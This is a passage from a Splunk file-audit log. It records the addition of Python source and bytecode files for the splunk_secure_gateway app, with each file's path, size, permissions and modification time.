size=379, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.941, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/py23.cpython-37.pyc", isdir=0, size=3440, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.936, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/mtls.cpython-37.pyc", isdir=0, size=892, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.932, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/loop_utils.cpython-37.pyc", isdir=0, size=1228, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.927, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/kvstore.cpython-37.pyc", isdir=0, size=3557, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.923, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/guid_generator.cpython-37.pyc", isdir=0, size=489, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.919, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/constants.cpython-37.pyc", isdir=0, size=10008, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.915, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/config.cpython-37.pyc", isdir=0, size=7826, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.910, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/cache.cpython-37.pyc", isdir=0, size=901, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.904, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/base_modular_input.cpython-37.pyc", isdir=0, size=1448, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.900, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/app_info.cpython-37.pyc", isdir=0, size=3632, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.896, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/alerts_ttl_utility.cpython-37.pyc", isdir=0, size=3310, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.892, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/__init__.cpython-37.pyc", isdir=0, size=233, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.788, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/splunk_utils/__pycache__/statestore.cpython-37.pyc", isdir=0, size=19541, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.784, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/splunk_utils/__pycache__/common.cpython-37.pyc", isdir=0, size=2778, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.781, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/splunk_utils/__pycache__/__init__.cpython-37.pyc", isdir=0, size=178, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.676, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/splunk_utils/statestore.py", isdir=0, size=29105, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.673, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/splunk_utils/common.py", isdir=0, size=2971, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.669, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/splunk_utils/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:14.666, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/splunk_utils/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.662, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/word_list.txt", isdir=0, size=13434, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.657, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/word_list.py", isdir=0, size=460, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.653, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/type_to_string.py", isdir=0, size=388, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.649, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/time_utils.py", isdir=0, size=1755, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.646, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/test_state.py", isdir=0, size=231, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.640, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/string_utils.py", isdir=0, size=423, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.637, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/splunk_utils", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.633, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/shard.py", isdir=0, size=135, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.628, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/py23.py", isdir=0, size=3239, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.624, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/mtls.py", isdir=0, size=726, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.618, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/loop_utils.py", isdir=0, size=1523, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.614, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/kvstore.py", isdir=0, size=3097, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.608, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/guid_generator.py", isdir=0, size=241, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.604, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/constants.py", isdir=0, size=9579, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.599, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/config.py", isdir=0, size=8192, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.594, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/cache.py", isdir=0, size=480, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.588, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/base_modular_input.py", isdir=0, size=1206, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.583, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/asyncio.py", isdir=0, size=629, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.577, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/app_info.py", isdir=0, size=4179, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.573, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/alerts_ttl_utility.py", isdir=0, size=3673, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.569, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:14.564, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.359, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/users/__pycache__/registered_users_sync.cpython-37.pyc", isdir=0, size=3256, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:12 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.354, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/users/__pycache__/__init__.cpython-37.pyc", isdir=0, size=234, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:12 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.349, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/users/registered_users_sync.py", isdir=0, size=2780, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.345, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/users/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:12 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:14.341, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/users/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.338, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__/visualization_type.cpython-37.pyc", isdir=0, size=1125, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.334, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__/telemetry_data.cpython-37.pyc", isdir=0, size=947, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.331, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__/subscription_data.cpython-37.pyc", isdir=0, size=15207, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.327, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__/search_type.cpython-37.pyc", isdir=0, size=969, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.323, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__/search_job_data.cpython-37.pyc", isdir=0, size=3350, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.319, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__/saved_search_data.cpython-37.pyc", isdir=0, size=1213, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.316, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__/form_input_data.cpython-37.pyc", isdir=0, size=7647, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.312, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__/event_handler.cpython-37.pyc", isdir=0, size=15765, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.309, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__/dispatch_state.cpython-37.pyc", isdir=0, size=1008, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.305, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__/dashboard_data.cpython-37.pyc", isdir=0, size=32440, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.301, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__/base.cpython-37.pyc", isdir=0, size=1715, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.298, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__/app_list_data.cpython-37.pyc", isdir=0, size=2868, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.294, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__/alert_data.cpython-37.pyc", isdir=0, size=8814, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.289, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__/__init__.cpython-37.pyc", isdir=0, size=233, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.084, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/visualization_type.py", isdir=0, size=809, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.078, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/telemetry_data.py", isdir=0, size=623, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.074, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/subscription_data.py", isdir=0, size=19047, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.070, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/search_type.py", isdir=0, size=590, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.064, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/search_job_data.py", isdir=0, size=3531, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.060, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/saved_search_data.py", isdir=0, size=866, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.056, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/form_input_data.py", isdir=0, size=8396, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.052, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/event_handler.py", isdir=0, size=13432, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.048, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/dispatch_state.py", isdir=0, size=633, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.044, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/dashboard_data.py", isdir=0, size=34357, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.040, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/base.py", isdir=0, size=1027, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.036, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/app_list_data.py", isdir=0, size=2375, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.032, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/alert_data.py", isdir=0, size=9313, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.029, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:14.025, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.920, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/access/__pycache__/access_control.cpython-37.pyc", isdir=0, size=1376, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.916, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/access/__pycache__/__init__.cpython-37.pyc", isdir=0, size=167, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.912, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/access/access_control.py", isdir=0, size=1265, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.908, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/access/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:13.904, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/access/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.798, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/udf/__pycache__/udf_util.cpython-37.pyc", isdir=0, size=3504, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.792, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/udf/__pycache__/udf_subscriptions.cpython-37.pyc", isdir=0, size=2450, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.787, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/udf/__pycache__/udf_request_processor.cpython-37.pyc", isdir=0, size=3087, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.783, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/udf/__pycache__/udf_data.cpython-37.pyc", isdir=0, size=4193, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.779, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/udf/__pycache__/__init__.cpython-37.pyc", isdir=0, size=164, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.775, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/udf/udf_util.py", isdir=0, size=3459, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.772, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/udf/udf_subscriptions.py", isdir=0, size=2730, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.768, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/udf/udf_request_processor.py", isdir=0, size=4371, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.765, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/udf/udf_data.py", isdir=0, size=4349, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.761, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/udf/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:13.757, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/udf/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.653, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/__pycache__/__init__.cpython-37.pyc", isdir=0, size=160, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.649, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions/__pycache__/spacebridge_exceptions.cpython-37.pyc", isdir=0, size=5134, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.645, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions/__pycache__/run_as_exceptions.cpython-37.pyc", isdir=0, size=1254, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.640, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions/__pycache__/load_balancer_exceptions.cpython-37.pyc", isdir=0, size=1142, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.634, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions/__pycache__/key_not_found_exception.cpython-37.pyc", isdir=0, size=766, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.630, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions/__pycache__/error_message_helper.cpython-37.pyc", isdir=0, size=1338, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.624, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions/__pycache__/__init__.cpython-37.pyc", isdir=0, size=239, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.620, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions/splunk_api_exceptions.py", isdir=0, size=356, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.616, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions/spacebridge_exceptions.py", isdir=0, size=3896, gid=41812, uid=41812, modtime="Fri Apr 2 